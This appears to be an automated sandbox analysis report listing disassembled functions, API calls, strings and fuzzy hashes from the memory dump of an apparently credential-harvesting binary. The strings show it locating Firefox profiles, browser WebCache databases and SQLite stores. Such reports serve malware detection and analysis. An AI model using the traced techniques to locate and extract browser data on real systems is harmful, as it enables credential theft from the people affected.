                                                                                                                                                                                    • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
                                                                                                                                                                                    Function 00444432 Relevance: 10.7, APIs: 1, Strings: 6, Instructions: 217COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memcpy.MSVCRT(00000048,00451D40,0000002C,000003FF,00445FAE,?,00000000,?,0040B879), ref: 004444E3
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpy
                                                                                                                                                                                    • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                                                                                                                                                                    • API String ID: 3510742995-2641926074
                                                                                                                                                                                    • Opcode ID: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                                                                                                                                    • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                                                                                                                                                                                    • Opcode Fuzzy Hash: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                                                                                                                                    • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                                                                                                                                                                                    Function 004032B4 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 119COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                                                                                                                      • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                                                                                                                                                                      • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                                                                                                                                                                    • memset.MSVCRT ref: 004033B7
                                                                                                                                                                                    • memcpy.MSVCRT(?,00000000,0000121C), ref: 004033D0
                                                                                                                                                                                    • wcscmp.MSVCRT ref: 004033FC
                                                                                                                                                                                    • _wcsicmp.MSVCRT ref: 00403439
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset$_wcsicmpfreememcpywcscmpwcsrchr
                                                                                                                                                                                    • String ID: $0.@
                                                                                                                                                                                    • API String ID: 2758756878-1896041820
                                                                                                                                                                                    • Opcode ID: 90c1bd1f00aab923b8f25d437f952d518439630af4329cefc1ee53129d619d56
                                                                                                                                                                                    • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                                                                                                                                                                                    • Opcode Fuzzy Hash: 90c1bd1f00aab923b8f25d437f952d518439630af4329cefc1ee53129d619d56
                                                                                                                                                                                    • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                                                                                                                                                                                    Function 004449B9 Relevance: 10.6, APIs: 7, Instructions: 61libraryloaderCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                                                                                                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2941347001-0
                                                                                                                                                                                    • Opcode ID: 42456554a4125e12c9760a290a1ae7f8766add3746ffa376f76814c589a7dd26
                                                                                                                                                                                    • Instruction ID: 45112ec7679d7541be2eaee67b01953ccf91f0241e5cd71b41190719d78dca83
                                                                                                                                                                                    • Opcode Fuzzy Hash: 42456554a4125e12c9760a290a1ae7f8766add3746ffa376f76814c589a7dd26
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2E115871840700EDEA207F72DD0FF2B7AA5EF40B14F10882EF555594E1EBB6A8119E9C
                                                                                                                                                                                    Function 00403BED Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 57COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 00403C09
                                                                                                                                                                                    • memset.MSVCRT ref: 00403C1E
                                                                                                                                                                                      • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                                      • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                                                                                                                                                                      • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                                                                                                                                                                    • wcscat.MSVCRT ref: 00403C47
                                                                                                                                                                                      • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                                                      • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                      • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                    • wcscat.MSVCRT ref: 00403C70
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memsetwcscat$CloseFolderPathSpecialwcscpywcslen
                                                                                                                                                                                    • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                                                                                                                                                    • API String ID: 1534475566-1174173950
                                                                                                                                                                                    • Opcode ID: 8452d1ff202b3ecdc32f03c4689b339ff6508c8f38893fabe83067ed25a4ac21
                                                                                                                                                                                    • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8452d1ff202b3ecdc32f03c4689b339ff6508c8f38893fabe83067ed25a4ac21
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                                                                                                                                                                                    Function 00414C2E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 77registryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                                                                                                                                    • SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                                    • memset.MSVCRT ref: 00414C87
                                                                                                                                                                                    • RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                    • wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                      • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressCloseFolderPathProcSpecialVersionmemsetwcscpy
                                                                                                                                                                                    • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                                                                                                    • API String ID: 71295984-2036018995
                                                                                                                                                                                    • Opcode ID: f400cfab40eb781a7377af97b809c3f02e1ff83a00fe342fd0a4f0569afe9d8a
                                                                                                                                                                                    • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                                                                                                                                                                                    • Opcode Fuzzy Hash: f400cfab40eb781a7377af97b809c3f02e1ff83a00fe342fd0a4f0569afe9d8a
                                                                                                                                                                                    • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                                                                                                                                                                                    Function 0041443E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • wcschr.MSVCRT ref: 00414458
                                                                                                                                                                                    • _snwprintf.MSVCRT ref: 0041447D
                                                                                                                                                                                    • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                                                                                                                                                                    • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                                                                                                                                    • String ID: "%s"
                                                                                                                                                                                    • API String ID: 1343145685-3297466227
                                                                                                                                                                                    • Opcode ID: aabbe202c5f79078aea71dac5ab2605718744c8b92afc7520f4e067a7367162e
                                                                                                                                                                                    • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                                                                                                                                                                                    • Opcode Fuzzy Hash: aabbe202c5f79078aea71dac5ab2605718744c8b92afc7520f4e067a7367162e
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                                                                                                                                                                                    Function 00413CA4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloadertimeCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00413CCF
                                                                                                                                                                                    • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressHandleModuleProcProcessTimes
                                                                                                                                                                                    • String ID: GetProcessTimes$kernel32.dll
                                                                                                                                                                                    • API String ID: 1714573020-3385500049
                                                                                                                                                                                    • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                                                                                                                    • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                                                                                                                    • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                                                                                                                                                                                    Function 004087B3 Relevance: 7.7, APIs: 6, Instructions: 190COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 004087D6
                                                                                                                                                                                      • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                                                                                      • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                                                                                                                                                                    • memset.MSVCRT ref: 00408828
                                                                                                                                                                                    • memset.MSVCRT ref: 00408840
                                                                                                                                                                                    • memset.MSVCRT ref: 00408858
                                                                                                                                                                                    • memset.MSVCRT ref: 00408870
                                                                                                                                                                                    • memset.MSVCRT ref: 00408888
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2911713577-0
                                                                                                                                                                                    • Opcode ID: 6684bba834465d20886231ffe2d62564197a18c1a2325da43f028315e65dbcab
                                                                                                                                                                                    • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                                                                                                                                                                                    • Opcode Fuzzy Hash: 6684bba834465d20886231ffe2d62564197a18c1a2325da43f028315e65dbcab
                                                                                                                                                                                    • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                                                                                                                                                                                    Function 0041F1A5 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 165COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memcmp.MSVCRT(?,?,00000004,?,00000065,004381DF,00000065,00000000,00000007,?,00000000), ref: 0041F202
                                                                                                                                                                                    • memcmp.MSVCRT(?,SQLite format 3,00000010,?,00000065,004381DF,00000065,00000000), ref: 0041F22D
                                                                                                                                                                                    • memcmp.MSVCRT(?,@ ,00000003,?,?,00000065,004381DF,00000065,00000000), ref: 0041F299
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcmp
                                                                                                                                                                                    • String ID: @ $SQLite format 3
                                                                                                                                                                                    • API String ID: 1475443563-3708268960
                                                                                                                                                                                    • Opcode ID: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                                                                                                                                    • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                                                                                                                                                                                    • Opcode Fuzzy Hash: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                                                                                                                                                                                    Function 004110DC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 68COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _wcsicmpqsort
                                                                                                                                                                                    • String ID: /nosort$/sort
                                                                                                                                                                                    • API String ID: 1579243037-1578091866
                                                                                                                                                                                    • Opcode ID: a0f12cb90dd745c164ef67684cb79943b88980d13b6e843c418957b63f9314a7
                                                                                                                                                                                    • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                                                                                                                                                                                    • Opcode Fuzzy Hash: a0f12cb90dd745c164ef67684cb79943b88980d13b6e843c418957b63f9314a7
                                                                                                                                                                                    • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                                                                                                                                                                                    Function 0040E5ED Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 61COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 0040E60F
                                                                                                                                                                                    • memset.MSVCRT ref: 0040E629
                                                                                                                                                                                      • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                                                                                                                                                                    • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memsetwcslen$AttributesFileFolderPathSpecialwcscatwcscpy
                                                                                                                                                                                    • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                                                                                                                                                    • API String ID: 2887208581-2114579845
                                                                                                                                                                                    • Opcode ID: 45b77cc57d7adabb6b76daf53bfb3be083a41c4971f5e6ab387fbe8a56a2d209
                                                                                                                                                                                    • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                                                                                                                                                                                    • Opcode Fuzzy Hash: 45b77cc57d7adabb6b76daf53bfb3be083a41c4971f5e6ab387fbe8a56a2d209
                                                                                                                                                                                    • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                                                                                                                                                                                    Function 004148B6 Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • FindResourceW.KERNELBASE(?,?,?), ref: 004148C3
                                                                                                                                                                                    • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                                                                                                                                                                    • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                                                                                                                                                                    • LockResource.KERNEL32(00000000), ref: 004148EF
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Resource$FindLoadLockSizeof
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3473537107-0
                                                                                                                                                                                    • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                                                                                                                    • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                                                                                                                                                                                    • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                                                                                                                                                                                    Function 0044DEF7 Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(02240048), ref: 0044DF01
                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(02250050), ref: 0044DF11
                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(00C26DA8), ref: 0044DF21
                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(02250458), ref: 0044DF31
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ??3@
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 613200358-0
                                                                                                                                                                                    • Opcode ID: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                                                                                                                                    • Instruction ID: aa45652f999bbb0892b85dcd7393972dd4dfe4e89c7b59a5f1a68188070d07e1
                                                                                                                                                                                    • Opcode Fuzzy Hash: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5EE08C60F0830052BA31EBBABD40E2723EC5E1AB4271A842FB905C3282CE2CC880C02D
                                                                                                                                                                                    Function 0043A9F6 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 979COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset
                                                                                                                                                                                    • String ID: only a single result allowed for a SELECT that is part of an expression
                                                                                                                                                                                    • API String ID: 2221118986-1725073988
                                                                                                                                                                                    • Opcode ID: d115b1de85cb0c2c74241db9f2e26d4ca9f76d3b3ab36ed3aa85b1754c3cbe0d
                                                                                                                                                                                    • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                                                                                                                                                                                    • Opcode Fuzzy Hash: d115b1de85cb0c2c74241db9f2e26d4ca9f76d3b3ab36ed3aa85b1754c3cbe0d
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                                                                                                                                                                                    Function 004125B6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,00000000,00412966,/deleteregkey,/savelangfile,?,?,?,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004125C3
                                                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 004125E7
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000083.00000002.21827033751.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ??3@DeleteObject
                                                                                                                                                                                    • String ID: r!A
                                                                                                                                                                                    • API String ID: 1103273653-628097481
                                                                                                                                                                                    • Opcode ID: 35011d0761a793af9b86058f165b74ada9e8dfd6de6a99c5cda2ffee1e56a26e
                                                                                                                                                                                    • Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
                                                                                                                                                                                    • Opcode Fuzzy Hash: 35011d0761a793af9b86058f165b74ada9e8dfd6de6a99c5cda2ffee1e56a26e
                                                                                                                                                                                    • Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19
                                                                                                                                                                                    Function 0040D092 Relevance: 5.1, APIs: 4, Instructions: 51COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D0CC
